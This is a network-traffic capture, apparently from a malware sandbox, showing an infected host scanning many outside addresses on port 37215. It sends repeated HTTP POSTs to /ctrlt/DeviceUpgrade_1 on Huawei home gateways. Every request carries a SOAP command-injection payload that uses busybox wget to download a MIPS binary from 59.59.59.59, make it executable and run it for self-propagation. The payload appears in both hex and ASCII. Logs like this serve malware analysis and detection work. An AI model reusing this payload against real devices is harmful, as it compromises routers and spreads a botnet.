                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1855192.168.2.1533594197.93.152.4937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.996295929 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1856192.168.2.154579641.25.79.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.998682022 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1857192.168.2.155514681.20.91.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.006107092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1858192.168.2.1548868157.154.28.1037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.011171103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1859192.168.2.155276841.105.239.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.070956945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1860192.168.2.1555346197.181.65.22637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.076222897 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1861192.168.2.1551800157.11.69.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.942982912 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1862192.168.2.1536844157.107.170.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.943005085 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1863192.168.2.1534390165.212.66.18437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.943031073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1864192.168.2.155498041.43.45.22237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.943084955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
